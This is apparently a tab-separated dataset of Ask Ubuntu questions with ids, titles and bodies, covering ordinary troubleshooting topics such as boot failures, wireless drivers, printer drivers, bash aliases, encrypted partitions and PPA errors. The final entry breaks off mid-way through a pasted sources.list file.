174649	bunch of zip binaries and a pckg_list	i got from one guy a directory with bunch of zip files ( /binary/* ) , and a pckg_list file , with a structure like , for example , that : package : tizen-ide version : 1.0.0 os : windows build-host-os : linux maintainer : jonghwan park < jonghwan2.park @ samsung.com > attribute : meta install-dependency : assignmenttracing-eplugin , sdb , eventinjector-eplugin , telephony-eplugin , webapp-eplugin , document src-path : /source/meta-tizen-ide_1.0.0.tar.gz path : /binary/tizen-ide_1.0.0_windows.zip origin : /home/sdk-package/dibs/unstable_public sha256 : e2ac88c0816bf1c966818e79f084413b97dce0fd3d8cd7f1086a10c6a46f67ce size : 545 description : install tizen ide inside of zip files we can find *.manifest files and directories , sometimes with files , sometimes without . so the question is : how can i get those zips with binaries into my system ? any ideas ? thank you !
174655	black screen when booting ubuntu on asus netbook	i tried installing ubuntu on my netbook through a bootable usb a few days back . after installation i happened to use ubuntu for quite some time and later shut down my netbook . when i tried booting the netbook again , it just shows a black screen with a blinking cursor after the initial asus screen . i tried opening bios by pressing f2 but it ai n't coming either . what should i do ? i pressed f2 during the asus screen and i 'm pretty sure that f2 is my bios button since i 've used it before . pressing ctrl+altl+del during the black window with blinking cursor makes the netbook restart . ctrl+alt+f1 ai n't doing anything..
174658	aircrack-ng channel problem under 12.04 lts	i would like to test security of my home wireless network , but i have lot of troubles with aircrack-ng . i am using 12.04 lts , linux-3.2.0-27-generic-pae . my wireless card is bcm4311 ( 14e4:4311 ) . now airodump works fine , and packet\ injection too ( aireplay-ng -9 wlan0 ) , but when i want to send fake auth , i get this message wlan0 is on channel 11 , but the ap uses channel 7 i tried to set channel with airmon and iwconfig , but it did n't help . i do n't use any network manager , i have read , that it sometimes causes troubles . what can i do ? do i have to install some patches ?
174667	should i first configure my new ubuntu server install before updating it ?	i 'm courious if there is any recommendation to configure fresh ubuntu server ( date , hosts , networking ) before `` apt-get upgrade '' or there is no difference ?
174676	brightness does n't decrease on an hp pavilion g6	i have a hp pavilion g6 laptop . after installing ubuntu , screen brightness does not not decrease . due to this high brightness , i am unable to use ubuntu properly . graphics- ati radeon . please help me solve the problem .
174679	graphic card radeon hd 5450 or geforce gt 210 with open source driver and hdmi	i want to buy a new graphic card . i want to use the card with an open source driver ( radeon / nouveau ) , but i need hdmi output . which is the better choice , radeon hd 5450 or geforce gt 210 ?
174682	the disk drive /boot/efi is not ready yet or not present error	i have installed ubuntu 12.04 64bit version . i have no problem with it until we tried to take a backup by using acronis true image software . normally , ubuntu was seen under bios menu under `` efi boot '' option . then , there was a problem with this software and ubuntu is lost from the efi boot menu . then , ubuntu can not boot . i have used the boot-repair software given in the following link . i have followed the steps given in recommended solution . i have installed gparted , deleted the fat32 boot partition and created an unformatted partition with bios_grub flag as recommended by the boot-repair software . after completing the recommended boot repair operation , now the ubuntu starts but gives an error as described in the title . the disk drive /boot/efi is not ready yet or not present error . continue to wait or press s to skip mounting or m for manual recovery . if i press s , i can login ubuntu and use it without any problem . also , i have checked and seen that under bios menu , ubuntu still does not exist under efi boot options . i have searched for the solution in forums and tried the recommended solutions given in the following link , but they did not work . please help to solve this problem , can i disable the efi boot option from ubuntu ?
174693	window 7 wo n't boot after installled ubuntu 12.04	i have a problem with dual boot . first i installed windows 7 to sda2 . the windows 7 boot partition is on sda1 ( 100 mb in size ) . last , i installed ubuntu with sda3 as / and sda4 as swap space . i have choose boot loader option for ubuntu is sda2 ( window 7 partition ) . ubuntu is ok , but windows 7 wont boot.help me please .
174694	does accomplishments work in lubuntu ?	i 've installed accomplishments in lubuntu , according to ubuntu.com . i connected it to my ubuntu one account . i 've registered myself on launchpad and ask ubuntu sites . i added accounts info to accomplishments and i waited few days but the trophies have not been verified . so i removed accomplishment and all connected files , which i had found and i 've installed it once again . i 've configured it once again but it still has n't verified launchpad and ask ubuntu trophies . i found repeated message in accomplishments ' log : 2012-08-11 17:37:04+0200 [ - ] -- - starting running scripts -- - 2012-08-11 17:37:04+0200 [ - ] no gnome-session process for user there is no gnome-session in lubuntu , i think ? so my question is , does it work correctly under lubuntu ?
174695	machine with intel 2200bg wireless stops connecting to wireless network	yesterday i just turned on my ubuntu machine and i decided to try xubuntu . i installed it and everything worked fine . after a few hours i saw that the machine loses wireless signal every 5-10 seconds and gets it back after a few seconds . i did n't know what to do , so i decided to reinstall ubuntu . i did that , installed xubuntu again , wireless was working fine . today i turned on my machine and saw that it ca n't even connect to the wireless network . i just keep connecting but it just ca n't connect . where could be the problem ? i tried to uninstall xubuntu but that did n't help . wireless signal is very good , because i 'm working with another windows machine and it 's great . and i do n't think that laptop 's hardware is broken , because yesterday when i was installing ubuntu he got the wireless signal without any problems . i 'm using ibm thinkpad r51 laptop . yesterday i was using ubuntu 12.04 , but today i 've installed 11.10 on my machine . by the way , here 's the output of the command sudo lspci -nn : http : //pastebin.com/gzwexhw0 02:02.0 network controller [ 0280 ] : intel corporation pro/wireless 2200bg [ calexico2 ] network connection [ 8086:4220 ] ( rev 05 ) so , do you have any ideas where is the problem ? edit : somehow it has connected to the wireless . i 'll try using it and i 'll tell if i have any problems and if it keeps disconnecting or something . edit1 : i 've noticed that after upgrading to 12.04 wireless does n't show anything , like there 'd be no available wireless spots , but the internet is working ... it 's connected to the router which is at my home . strange ...
174696	problem connecting to wirless internet - computer will not boot with networking unless ethernet cable is connected	ubuntu server 12.04 , fully updated , with lxde installed ... i have a problem with my wireless connection and do n't know how to solve it . i ca n't get any networking at all unless i plug the ethernet cable into the computer when i boot up . being a laptop , i ca n't use it outside my own home ( unless there is an ethernet cable to plug into ) because of this . can someone help me fix this ? the info i have to offer so far is this : when the computer boots up there is some text that rolls by during the boot process ( initial screen ) telling you what 's going on with the boot process . if i leave the ethernet cable unplugged and allow it to boot that way i will see a message that says it 's waiting for network configuration . a while after that , it will say it 's going to wait up to another 60 seconds for network configuration . after what seems like several minutes it will boot into the operating system but there will be no network service running at all ( no networking ) . if i plug the ethernet cable in before or very quickly while booting it will boot normally , it will detect my wireless connection here at home ( which happens to be a hidden connection ) , i can then unplug the ethernet cable and use my computer normally . it is the same if i boot the computer at a friend 's house . if the cable is plugged in it will boot normally and pick up their wireless connection and connect to it , if i do n't plug in the cable it will do as described above for that scenario . i am using network manager . if anyone can help i would sure appreciate this . i am about to move to a new location in two weeks and will have to transfer my internet service there . until it is set up at that location i would be unable to connect to the internet . i take online courses at a nearby university and classes start on aug 28th ( so i 'll have to be able to get on the internet somehow ) . i would go to mcdonalds or burger king or some coffee shop to use their connection but would not be able to connect there anyway since they would not have an ethernet cable they could let me plug into . please , if anyone is able , help me to get this solved before my classes start again . output of `` less syslog | grep etwork | pastebinit is available here : http : //paste.ubuntu.com/1141667/ thank you jake
174697	update manager shows '2 updates have been selected ' when there are no updates	the update manager is showing '2 updates have been selected ' and that 4.1mb will be downloaded . in the info box , no updates are shown . when i click 'install updates ' , the installing updates box opens and closes immediately and it shows the progress bar as it shows after it 's done refreshing the sources . i did 'sudo apt-get upgrade ' in the terminal and it shows that no updates are available . what 's the deal ? reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
174708	external monitor not recognized dynamically with nvidia graphics card	i am using ubuntu 12.04 on dell e6420 with nvidia nvs4200m . i can configure any external display properly using nvidia x server settings , but monitors are not recognized automatically nor recognized as absent automatically - every change i make must be manually defined and applied . this can be annoying as i move around a lot and use many different displays/projectors . i have found discussions of a similar problem here and here any help would be appreciated .
174710	/sbin/getty process causing 100 % cpu utilization	i have an instance of ubuntu 12.04 lts ( gnu/linux 3.2.0-25-virtual i686 ) running as a kvm-vm on a host-machine that runs one more vm beside it . i deploy a ruby on rails application using the capistrano deployment-gem . however , if i deploy twice in a row in a short time , the cpu usage jumps to 100 % because of the /sbin/getty process . how can this be ? i believe getty is a rather simple program that passes a login-name from a terminal to a login-process . also : in my capfile ( capistrano configuration file ) i am running certain commands after the rails application is deployed including a call to sudo /sbin/restart < appname > which is an upstart task . could this be related somehow ? i can always kill the getty process and the problem is gone until the next deployment , but i would rather understand and fix the problem . any help is appreciated . attached is a screenshot of my problem .
174713	how to force ubuntu to load and use my .ppd printer driver instead of the default one ?	i have a dell 1815dn printer and a laptop with ubuntu 12.04 . ubuntu recognizes the printer automatically and installs a default driver . but this driver lacks the option to bypass the toner-saver function which is very important for me since some times i want no toner-saver function as i need more contrast . i have a propietary .ppd file from dell that i have been using in past ubuntu releases , and even currently in another computer with ubuntu 12.04 . but now i do n't now how to force ubuntu to skip the default driver and load and use instead the one i have ( for some reason i got ubuntu to ask me for the .ppd in the other computer , now i do n't now how ) . any help on how to do this ? my prefered solution would be that the gui asks me for the .ppd i have and load it , as i always have done . another solution would be to know the folder in which i need to put the propietary .ppd file and know how to force ubuntu to use it . thanks , alex
174718	starting eclipse from the unity launcher does n't work correctly	when i start eclipse from the unity launcher i get this message : could not find the folder 'tools ' inside sdk '/home/engine/android-sdks/' but when i type in the terminal sudo eclipse it works properly , and after running sudo chown -r $ user : $ user ~ i got this : /home/engine/.gvfs : permission denied after that i tried : engine @ engine : ~ $ ls -al /home/engine/android-sdks/ and i got this : total 36 drwxrwxr-x 5 engine engine 4096 jul 31 22:17 . drwx -- -- -- 57 engine engine 20480 aug 11 10:26 .. drwxrwxr-x 2 engine engine 4096 jul 31 22:17 add-ons drwxrwxr-x 2 engine engine 4096 jul 31 22:17 platforms drwxrwxr-x 2 engine engine 4096 jul 31 22:17 temp thanks eliah kagan is there any reason for this ?
174721	is eval $ ( cat filename ) the same as source filename ?	working on some bash functions , i did n't know source ... command , so i used eval $ ( cat ... ) instead . now i am wondering , whethe should i change every use of that , or is it just the same function ? they appear to work the same now , but maybe there will be some misleading differences later , i just want to know .
174725	install a 'recommended ' package when user asks for corresponding action	let 's say that i am building an application to a deb package , which has as recommended dependency a package , let 's call it package1 . so , package1 , if installed , can provide extra functionality to my program , but not directly related to my program 's basic functionality ( that 's why it is a recommended package ) so , the user does n't choose initially to install the recommended package ( in ubuntu software center you can choose by ticking/unticking to install or not to install the recommended packages ) , but in the future , while using my application , it asks for the corresponding functionality . what is the best way to tell him that an extra package has to be installed in order for this functionality to work ? what program can i use so as to install this package directly from my program with a dialog indicating how the installation process is going ? i want to do this via the default way , and , preferably a way that is linux desktop environment independent . in short , i want a way to install a package from my program neither by opening ubuntu software center ( via an apt : // url ) nor by doing it at the background . ideally , it would be a dialog like the one that is used by the update manager ( or , for the ones that remember , from the synaptic package manager ) . ps : i would prefer something that could be implemented using c++ !
174727	ca n't right click on an hp pavilion dv6	after installing , i initially assumed that right-clicking just was n't a feature . i 've been trying to separate myself from what i 'm accustomed to in windows , so i did n't think much of it . i 've since read that right-clicking is definitely something other people are able to do . however , right-clicks , in any context , are behaving as left-clicks . i 'm using the touch-pad on an hp pavilion dv6 laptop . did something go wrong with my installation ? maybe a driver issue ? i 've tried quite a few google searches on the issue , and i have n't come up with any results relating to a complete loss of right-mouse functionality . i have read that shift+f10 is the default keyboard shortcut for right-clicking . however , i am finding that it has no noticeable effect whatsoever when used . i 've checked system settings , and i do n't see anything that allows for toggling the right touch-pad button on or off . lacking experience with the system , i do n't really know where to look next . my questions then , would be : am i crazy , or does 12.04 normally have a right-click function that brings up a menu pane ? is this a problem that anyone has heard of or encountered previously ? if so , how has it been resolved in the past ? my buttons are indeed part of a click-pad . i checked some of the `` related '' links that showed up with the page . i checked synclient -l and found that quite a few parameters were questionably set at 0 . rightbuttonarealeft = 0 rightbuttonarearight = 0 rightbuttonareatop = 0 rightbuttonareabottom = 0 the same goes for the middlebuttonx parameters , but i 'm not concerned about those . clickpad = 1 all of the areaxedge parameters = 0 at the top of the list , these four parameters stand out : leftedge = 1766 rightedge = 5378 topedge = 1627 bottomedge = 4331 i have n't tried to adjust these before . i imagine that it could easily vary a great deal between click-pad models , but does anyone know which of the above parameters i actually want to adjust , and to what values ?
174746	permissions for apache webroot folder on dev server ?	i am a web developer and have apache setup on my local system for testing . i keep running into issues with the permissions e.g . unless i chmod any new directories to 777 my ide can not write to the files there . i was hoping there was a way to add myself to the group that has control of the www folder ( and any sub folders ) so i do not have to chmod the files every time .
174748	how can i run ubuntu and xubuntu in different partitions ( as different os )	how can i have ubuntu and xubuntu as different os , so that when i turn on my computer i can choose between ubuntu and xubuntu or other ubuntu variant ?
174757	autocomplete on .bash_aliases commands ?	i have a whole bunch of aliased commands in .bash_aliases the most generic examples are alias apt-update= '' sudo apt-get update '' alias apt-upgrade= '' sudo apt-get dist-upgrade '' but then i also have alias apt-install= '' sudo apt-get install `` alias a2avail= '' /etc/apache2/sites-available '' the first two are no issue , the second two i want to make the more powerful ; specifically for apt-install i want autocomplete to work . for a2avail i want to be able to type something like sudo cp a2avail/default a2avail/new and have it run as sudo cp /etc/apache2/sites-available/default /etc/apache2/sites-available/new are either of these two things possible ?
174759	how to completely uninstall ubuntu ?	i have had ubuntu on my netbook for a while now but i really need windows back on my netbook for one of my classes . i have no idea how to uninstall it . every way i have seen so far that removes it off my netbook seems to lead me to another problem . my netbook ca n't read cds because there is no cd drive . i just bought windows 7 but all it came with is a code . i really need help . i have ubuntu 12.04 .
174763	how do i change the default log-in to xubuntu on ubuntu 12.04 ?	i thought i would set up my girlfriend 's tired old netbook running a less broken os than linspire . nice idea . i have a similar machine ( acer aspire one ) running ubuntu and that worked fine . however , when i installed it on hers , it decided to use unity3d and nothing else . she has it set up to log her in automatically and it seems that no matter how much i set up /etc/lightdm/lightdm.conf to have user-session=xubuntu it does nothing . it shows the xubuntu loading screen , then pops her into a painfully slow unity3d desktop that her system can not support at all . there does n't seem to be anything i can do to change it . if i remove /etc/lightdm/lightm.conf altogether it puts me through to a `` low graphics mode '' screen where the keyboard does n't work and there is nothing one can do but switch off the machine and reboot in recovery mode . everytime the machine starts up the .dmrc file in the user 's home directory gets overwritten so if i change that to use xubuntu it is back to unity the next time it starts . my girlfriend is increasingly of the opinion that i broke her computer , which given that we are running a long distance relationship partly through that computer , makes me a very bad boyfriend . please help !
174770	is there a way to set a hotkey to change screen brightness ?	the brightness keys on my laptop are not recognized by ubuntu , which is a common problem for a variety of laptops , is there a way to set an arbitrary key shortcut to change brightness in ubuntu 12.04 ? i looked in the keyboard settings app under the shortcut tab , and i could n't find one . i am able to set brightness in the brightness and lock settings app , but it would be much more convenient if i could just assign a key shortcut , like ctrl+f2 and ctrl+f3 .
174774	why is zero swap being used on my setup ?	from the looks of the swaps proc ; ubuntu : ~ $ cat /proc/swaps filename type size used priority /dev/sdc2 partition 4104188 0 -1 ubuntu : ~ $ and from top : ubuntu : ~ $ top top - 09:35:37 up 9:07 , 9 users , load average : 1.43 , 0.80 , 1.09 tasks : 206 total , 3 running , 202 sleeping , 0 stopped , 1 zombie cpu ( s ) : 4.4 % us , 2.2 % sy , 0.0 % ni , 50.5 % id , 42.5 % wa , 0.0 % hi , 0.3 % si , 0.0 % st mem : 3088492k total , 2619440k used , 469052k free , 238536k buffers swap : 4104188k total , 0k used , 4104188k free , 1769788k cached both say that zero swap is actually being used . i 'm using a 64bit capable core2 duo dell laptop with 4gigs of ram running 32bit ubuntu precise on a persistent live usb stick . i may be answering my own question but i wonder if the liveusb stick nature of the environment is somehow related ... let me know if you need more information .
174782	sb x-fi problem on 12.04 lts	i set 5.1 on the sound options under ubuntu , but i do n't get centerbox and subwoofer output when i click to the test buttons ( soundspeakers grafiks ) . when i work under win 7 every speakers works properly . how can i improve or check my drivers of ubuntu ? is there a driver from alsa i can use it to get work all speakers ( 5.1 ) under ubuntu ? please help , i do n't have knowledge on ubuntu quite well .
174785	lenovo ideapad 205 and ubuntu 12.04 lts	i just wanted to report one thing , because i know there are a lot of ideapad s205 users out there , that had issues running ubuntu on their lenovo ideapad s205 in the past . lenovo ideapad with ubuntu 12.04 lts : everything works out of the box . i just installed it and everything , including the microphone , the webcam , the wlan , the amd e-350 cpu/gpu and the sound worked right away . in other words : everything works . even the amd e-350 gpu works very well with the open source drivers and with the prop . drivers . the prop . drivers were automatically offered to me via ubuntu itself . it works great . a long idea , written short : i love it . it 's extremly stable and very fast . i am using the german version of the idepad s205 , combined with the 32bit version of ubuntu . there is only one , single thing to keep in mind when installing ubuntu on the s205 : plugin your usb/cd/dvd drive in the left usb-port . i do n't know why , but it only works with the usb-port on the left side of the netbook . this is only for installing ubuntu . after it has been installed and updated successfully , all of the usb ports will work . oranges - > feedback on lenovo s205 with ubuntu 12.04 lts .
174788	'sudo apt-get build-dep ffmpeg ' fails because of libjack0 in ubuntu 12.04	i 'm trying to build ffmpeg from source so i can add libx264 support , but sudo apt-get build-dep ffmpeg gives me : reading package lists ... done building dependency tree reading state information ... done picking 'libav ' as source package instead of 'ffmpeg' the following packages have unmet dependencies : libjack-dev : depends : libjack0 ( = 1:0.121.0+svn4538-3ubuntu1 ) but it is not going to be installed e : build-dependencies for ffmpeg could not be satisfied .
174798	`` system program problem detected ''	i have ubuntu 12.04 lts and it started showing `` system program problem detected '' . i think it could be because my windows is corrupt and i installed ubuntu through wubi . thanks in advance .
174804	i ca n't copy to external drive , read only error ; ca n't change permissions even from sudo nautilus	my drive was just fine an hour ago . i copied a couple of movies to it , and the cord accidentally came out , and now it keeps loading as `` read only '' every time . i tried rebooting , logging in and out , switching cables , running sudo nautilus and changing all permissions to read and write , but even in sudo nautilus it told me that it is a read only system and that i can not copy anything to the drive .
174805	where are the login screen images stored on the hd	i 'm in ubuntu 12.04 using two monitors . in the login screen in one monitor i have the purple background with the usernames list and the password text field . in the second monitor i have a version of the purple wallpaper with the ubuntu logo in white in the center , anyone knows where can i find this image ?
174806	standalone of compiz and google chrome with borders	hi i 've found this video that shows a standalone of google chrome and compiz and i wanted to do it too ! sadly he did n't say how to do it or anything and i even checked his site . i did the steps but when i make it and log in all i get is google chrome a black background and no compiz and it 's border less . how can i perform the same thing as in the video ?
174811	transfering files from my htc to my laptop fails via bluetooth , why ?	i am trying to send some files from my htc to my laptop having ubuntu 12.04 through a bluetooth ; but while trying to send files i see the following error on my htc device : - this transfer is forbidden by the target device what does this error means , any permission issues ? or something else . what settings do i need to make so that ubuntu can accept files easily . i am able to send files from ubuntu to htc device via bluetooth .
174812	sub-process /usr/bin/dpkg returned an error code ( 1 ) due to glance-registry	shortly after logging in , a system error pops up with a prompt to report the error . it refers to `` glance-registry . '' the error icon at the top of the workspace says error : brokencount > 0 presumably this is a dependency issue . clicking on the icon runs the package manager . automatic error reporting crashes before it can complete . update manager and software center both return errors related to glance-registry and then crash . some of the error reporting messages indicate that packages are outdated and need to be upgraded/resolved before the error can be reported . through the terminal ( because it does n't crash right after opening ) , i can run sudo apt-get upgrade -f to get things current for error reporting . but after a lengthy run and the process apparently fixing/upgrading/eliminating a number of packages , it still returns this error at the bottom : errors were encountered while processing : glance-registry glance e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have not seen many references to glance-registry on this site . is this still something a user can fix ? should i scrub the os and reinstall ?
174814	modifying the gnome classic panel	how can i modify the panel ( in classic gnome mode ) such as adding items , moving , etc . in ubuntu 12.04 ? i had the same problem with an earlier version of ubuntu here , which received an answer to press alt while right clicking , and it worked for that version , but this does not seem to work for 12.04 .
174816	forcing to install dependencies from custom repositry ?	i have setup a local directory repository , but ubuntu installs from remote repository . how can i force it to install from my local repository ?
174818	how do i customize the `` cryptroot '' script ?	i have a system where all the partitions ( / , /home , and swap ) are encrypted except for /boot . /boot resides in an external device which also contains a set of encrypted key files used to automatically decrypt all of the partitions . in other words , my desired end result was to have 2-factor authentication using an external device and a password where the password would be entered once during boot and the boot scripts would use the password to decrypt all of the partitions . i 'm a newbie to ubuntu ( and linux in general ) , but i did some trial and error modifying the various scripts found in initrd.img using update-initramfs . the cryptroot script seemed to be doing all the work mounting the partitions at first , but after some experimenting , it appears that it is only responsible for decrypting the root file system . i had modified a string in the script changing enter the passphrase to simply password , which appeared to work when decrypting the root file system , but used the old prompt again for decrypting the next partition . in other words , this is what i 'm getting : cryptroot script loads . the script asks for a password to decrypt the key partition and mounts it . the script calls the setup_mapping function to decrypt the root file system . the script tries to read the key file from the key partition to decrypt the root file system . the root file system is decrypted and mounted . the system prompts to enter a passphrase to decrypt the next partitionâś i think ubuntu might be running another copy of the cryptroot script somewhere to decrypt all the other partitions after root , but i do n't know what else to modify .
174820	will ubuntu be releasing an update for cedar trail processors ?	there is a file available on the intel web site with the file name `` cdv-gfx-drivers-1.0.1_bee.tar.bz2 '' and a date of july 6 , 2012 . it can be found by searching the intel download center for the filename or the string `` linux* powervr graphics/media drivers '' . the download page links to the file , release notes and a link , enabling hardware accelerated playback that takes one to a page containing links to two pdf documents titled `` enabling hardware accelerated playback for intel速 atomtm processor n2000/d2000 series '' , one for ubuntu and one for fedora . the instruction and release notes speak to working with kernel 3.1.0 and since i do not feel i have the skills , knowledge or training to do anything else but , follow the instructions to the `` t '' , i am very reluctant to try anything on my freshly updated 3.2.0 kernel . i would much rather use a ubuntu supported kernel that applies these drivers and does n't break anything in the process . is it a case where this is so new that canonical has not yet included these drivers but , soon will do so ?
174821	why do i get a 404 error from the `` boost-latest '' ppa on 11.04 ?	i followed boost-latest webpage . i use ubuntu 11.04 ( natty ) . i add repository success : sam @ sam : ~ $ sudo add-apt-repository ppa : boost-latest/ppa executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /etc/apt/secring.gpg -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver hkp : //keyserver.ubuntu.com:80/ -- recv d9cff117bd794dce7c080e310cfb84ae029db5c7 gpg : requesting key 029db5c7 from hkp server keyserver.ubuntu.com gpg : key 029db5c7 : `` launchpad boost-latest '' not changed gpg : total number processed : 1 gpg : unchanged : 1 sam @ sam : ~ $ but when i apt-get update , it shows the error : sam @ sam : /etc/apt/sources.list.d $ sudo apt-get update ign http : //packages.ros.org natty inrelease ign http : //tw.archive.ubuntu.com natty inrelease ign http : //tw.archive.ubuntu.com natty-updates inrelease hit http : //tw.archive.ubuntu.com natty release.gpg hit http : //tw.archive.ubuntu.com natty-updates release.gpg hit http : //tw.archive.ubuntu.com natty release hit http : //tw.archive.ubuntu.com natty-updates release ign http : //linux.dropbox.com natty inrelease hit http : //tw.archive.ubuntu.com natty/main sources hit http : //tw.archive.ubuntu.com natty/restricted sources hit http : //tw.archive.ubuntu.com natty/universe sources hit http : //tw.archive.ubuntu.com natty/multiverse sources hit http : //tw.archive.ubuntu.com natty/main amd64 packages hit http : //tw.archive.ubuntu.com natty/restricted amd64 packages hit http : //tw.archive.ubuntu.com natty/universe amd64 packages hit http : //tw.archive.ubuntu.com natty/multiverse amd64 packages ign http : //tw.archive.ubuntu.com natty/main translationindex ign http : //tw.archive.ubuntu.com natty/multiverse translationindex ign http : //tw.archive.ubuntu.com natty/restricted translationindex ign http : //tw.archive.ubuntu.com natty/universe translationindex hit http : //tw.archive.ubuntu.com natty-updates/main sources hit http : //tw.archive.ubuntu.com natty-updates/restricted sources hit http : //tw.archive.ubuntu.com natty-updates/universe sources hit http : //tw.archive.ubuntu.com natty-updates/multiverse sources hit http : //tw.archive.ubuntu.com natty-updates/main amd64 packages hit http : //tw.archive.ubuntu.com natty-updates/restricted amd64 packages hit http : //tw.archive.ubuntu.com natty-updates/universe amd64 packages hit http : //tw.archive.ubuntu.com natty-updates/multiverse amd64 packages ign http : //tw.archive.ubuntu.com natty-updates/main translationindex ign http : //tw.archive.ubuntu.com natty-updates/multiverse translationindex ign http : //tw.archive.ubuntu.com natty-updates/restricted translationindex ign http : //tw.archive.ubuntu.com natty-updates/universe translationindex hit http : //packages.ros.org natty release.gpg ign http : //tw.archive.ubuntu.com natty/main translation-en ign http : //tw.archive.ubuntu.com natty/multiverse translation-en ign http : //tw.archive.ubuntu.com natty/restricted translation-en ign http : //tw.archive.ubuntu.com natty/universe translation-en ign http : //tw.archive.ubuntu.com natty-updates/main translation-en ign http : //tw.archive.ubuntu.com natty-updates/multiverse translation-en ign http : //tw.archive.ubuntu.com natty-updates/restricted translation-en ign http : //tw.archive.ubuntu.com natty-updates/universe translation-en hit http : //linux.dropbox.com natty release.gpg hit http : //packages.ros.org natty release ign http : //extras.ubuntu.com natty inrelease ign http : //ppa.launchpad.net natty inrelease ign http : //ppa.launchpad.net natty inrelease ign http : //ppa.launchpad.net natty inrelease hit http : //packages.ros.org natty/main amd64 packages hit http : //linux.dropbox.com natty release ign http : //packages.ros.org natty/main translationindex hit http : //extras.ubuntu.com natty release.gpg ign http : //security.ubuntu.com natty-security inrelease ign http : //ppa.launchpad.net natty inrelease ign http : //ppa.launchpad.net natty inrelease ign http : //ppa.launchpad.net natty inrelease ign http : //ppa.launchpad.net natty release.gpg hit http : //ppa.launchpad.net natty release.gpg hit http : //linux.dropbox.com natty/main amd64 packages ign http : //linux.dropbox.com natty/main translationindex hit http : //extras.ubuntu.com natty release hit http : //security.ubuntu.com natty-security release.gpg hit http : //ppa.launchpad.net natty release.gpg hit http : //ppa.launchpad.net natty release.gpg hit http : //ppa.launchpad.net natty release.gpg hit http : //security.ubuntu.com natty-security release hit http : //extras.ubuntu.com natty/main sources hit http : //ppa.launchpad.net natty release.gpg ign http : //ppa.launchpad.net natty release ign http : //packages.ros.org natty/main translation-en hit http : //extras.ubuntu.com natty/main amd64 packages ign http : //extras.ubuntu.com natty/main translationindex hit http : //security.ubuntu.com natty-security/main sources hit http : //ppa.launchpad.net natty release hit http : //ppa.launchpad.net natty release hit http : //ppa.launchpad.net natty release ign http : //linux.dropbox.com natty/main translation-en hit http : //security.ubuntu.com natty-security/restricted sources hit http : //security.ubuntu.com natty-security/universe sources hit http : //security.ubuntu.com natty-security/multiverse sources hit http : //security.ubuntu.com natty-security/main amd64 packages hit http : //security.ubuntu.com natty-security/restricted amd64 packages hit http : //security.ubuntu.com natty-security/universe amd64 packages hit http : //security.ubuntu.com natty-security/multiverse amd64 packages ign http : //security.ubuntu.com natty-security/main translationindex ign http : //security.ubuntu.com natty-security/multiverse translationindex ign http : //security.ubuntu.com natty-security/restricted translationindex hit http : //ppa.launchpad.net natty release hit http : //ppa.launchpad.net natty release ign http : //security.ubuntu.com natty-security/universe translationindex ign http : //ppa.launchpad.net natty/main translationindex hit http : //ppa.launchpad.net natty/main sources hit http : //ppa.launchpad.net natty/main amd64 packages ign http : //ppa.launchpad.net natty/main translationindex hit http : //ppa.launchpad.net natty/main sources hit http : //ppa.launchpad.net natty/main amd64 packages ign http : //ppa.launchpad.net natty/main translationindex hit http : //ppa.launchpad.net natty/main sources hit http : //ppa.launchpad.net natty/main amd64 packages ign http : //ppa.launchpad.net natty/main translationindex hit http : //ppa.launchpad.net natty/main sources hit http : //ppa.launchpad.net natty/main amd64 packages ign http : //ppa.launchpad.net natty/main translationindex hit http : //ppa.launchpad.net natty/main sources hit http : //ppa.launchpad.net natty/main amd64 packages ign http : //ppa.launchpad.net natty/main translationindex ign http : //extras.ubuntu.com natty/main translation-en err http : //ppa.launchpad.net natty/main sources 404 not found err http : //ppa.launchpad.net natty/main amd64 packages 404 not found ign http : //security.ubuntu.com natty-security/main translation-en ign http : //ppa.launchpad.net natty/main translation-en ign http : //security.ubuntu.com natty-security/multiverse translation-en ign http : //ppa.launchpad.net natty/main translation-en ign http : //ppa.launchpad.net natty/main translation-en ign http : //ppa.launchpad.net natty/main translation-en ign http : //ppa.launchpad.net natty/main translation-en ign http : //security.ubuntu.com natty-security/restricted translation-en ign http : //security.ubuntu.com natty-security/universe translation-en ign http : //ppa.launchpad.net natty/main translation-en w : failed to fetch http : //ppa.launchpad.net/boost-latest/ppa/ubuntu/dists/natty/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/boost-latest/ppa/ubuntu/dists/natty/main/binary-amd64/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . sam @ sam : /etc/apt/sources.list.d $ my update sources pic : my /etc/apt/sources.list.d directory : sam @ sam : /etc/apt/sources.list.d $ ls boost-latest-ppa-natty.list openrave-release-natty.list.save bumblebee-stable-natty.list ros-latest.list bumblebee-stable-natty.list.save ros-latest.list.save dropbox.list tim-klingt-ppa-natty.list dropbox.list.save tim-klingt-ppa-natty.list.save gummi-gummi-natty.list v-launchpad-jochen-sprickerhof-de-pcl-natty.list gummi-gummi-natty.list.save v-launchpad-jochen-sprickerhof-de-pcl-natty.list.save openrave-release-natty.list sam @ sam : /etc/apt/sources.list.d $ and my sources.list : sam @ sam : /etc/apt $ cat sources.list # deb cdrom : [ ubuntu 11.04 _natty narwhal_ - release amd64 ( 20110427.1 ) ] / natty main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //tw.archive.ubuntu.com/ubuntu/ natty main restricted deb-src http : //tw.archive.ubuntu.com/ubuntu/ natty main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //tw.archive.ubuntu.com/ubuntu/ natty-updates main restricted deb-src http : //tw.archive.ubuntu.com/ubuntu/ natty-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //tw.archive.ubuntu.com/ubuntu/ natty universe deb-src http : //tw.archive.ubuntu.com/ubuntu/ natty universe deb http : //tw.archive.ubuntu.com/ubuntu/ natty-updates universe deb-src http : //tw.archive.ubuntu.com/ubuntu/ natty-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //tw.archive.ubuntu.com/ubuntu/ natty multiverse deb-src http : //tw.archive.ubuntu.com/ubuntu/ natty multiverse deb http : //tw.archive.ubuntu.com/ubuntu/ natty-updates multiverse deb-src http : 